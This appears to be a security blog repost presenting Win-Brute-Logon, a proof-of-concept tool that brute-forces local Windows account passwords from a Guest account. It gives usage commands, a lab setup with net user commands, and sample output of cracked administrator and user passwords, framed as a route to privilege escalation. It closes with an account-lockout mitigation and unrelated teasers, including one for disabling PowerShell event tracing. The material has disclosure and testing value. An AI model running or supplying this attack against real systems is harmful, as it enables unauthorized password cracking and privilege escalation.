Win-Brute-Logon PoC is more what I would call a serious weakness in Microsoft Windows Authentication mechanism than a vulnerability.
The biggest issue is related to the lack of privilege required to perform such actions.
Indeed, from a Guest account (The most limited account on Microsoft Windows), you can crack the password of any available local users.
Find out which users exists using command : net user
This PoC is using multithreading to speed up the process and support both 32 and 64bit.
WinBruteLogon.exe -u <username> -w <wordlist_file>
type <wordlist_file> | WinBruteLogon.exe -u <username> -
Tested on Windows 10
Install and configure a freshly updated Windows 10 virtual or physical machine.
In my case full Windows version was : 1909 (OS Build 18363.778)
Log as administrator and lets create two different accounts : one administrator and one regular user. Both users are local.
/!\ Important notice: I used the Guest account for the demo but this PoC is not only limited to Guest account, it will work from any account / group (guest user / regular user / admin user etc…)
net user darkcodersc /add
net user darkcodersc trousers
(trousers is the password)
net localgroup administrators darkcodersc /add
net user HackMe /add
net user HackMe ozlq6qwm
(ozlq6qwm is the password)
net user GuestUser /add
net localgroup users GuestUser /delete
net localgroup guests GuestUser /add
In my case both trousers
and ozlq6qwm
are in SecList : https://github.com/danielmiessler/SecLists/blob/master/Passwords/Common-Credentials/10k-most-common.txt
Logoff from administrator account or restart your machine and log to the Guest account.
Place the PoC executable anywhere you have access as Guest user.
Usage : WinBruteLogon.exe -v -u <username> -w <wordlist_file>
-v
is optional, it design the verbose mode.
By default, domain name is the value designated by %USERDOMAIN%
env var. You can specify a custom name with option -d
darkcodersc
(Administrator)prompt(guest)>WinBruteLogon.exe -v -u darkcodersc -w 10k-most-common.txt
Wait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory…
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads…
[INFO] New “TWorker” Thread created with id=2260, handle=364
[INFO] New “TWorker” Thread created with id=3712, handle=532
[DONE] Done.
[ OK ] Password for username=[darkcodersc] and domain=[DESKTOP-0885FP1] found = [trousers]
[ .. ] Finalize and close worker threads…
[INFO] “TWorkers”(id=2260, handle=364) Thread successfully terminated.
[INFO] “TWorkers”(id=3712, handle=532) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
HackMe
(Regular User)prompt(guest)>WinBruteLogon.exe -v -u HackMe -w 10k-most-common.txt
Wait few seconds to see the following result:
[ .. ] Load 10k-most-common.txt file in memory…
[DONE] 10002 passwords successfully loaded.
[INFO] 2 cores are available
[ .. ] Create 2 threads…
[INFO] New “TWorker” Thread created with id=5748, handle=336
[INFO] New “TWorker” Thread created with id=4948, handle=140
[DONE] Done.
[ OK ] Password for username=[HackMe] and domain=[DESKTOP-0885FP1] found = [ozlq6qwm]
[ .. ] Finalize and close worker threads…
[INFO] “TWorkers”(id=5748, handle=336) Thread successfully terminated.
[INFO] “TWorkers”(id=4948, handle=140) Thread successfully terminated.
[DONE] Done.
[INFO] Ellapsed Time : 00:00:06
If you gain access to a low privileged user, you could crack the password of a more privileged user and escalate your privilege.
Open secpol.msc
then go to Account Policies
> Account Lockout Policy
and edit value Account lockout threshold
with desired value from (1 to 999).
Value represent the number of possible attempt before getting locked.
/!\ LockDown Policy wont work on Administrator account. At this moment, best protection for Administrator account (if Enabled) is to setup a very complex password.
Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…
This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…
GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…
Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…
The free and open-source security platform SecHub, provides a central API to test software with…
Don't worry if there are any bugs in the tool, we will try to fix…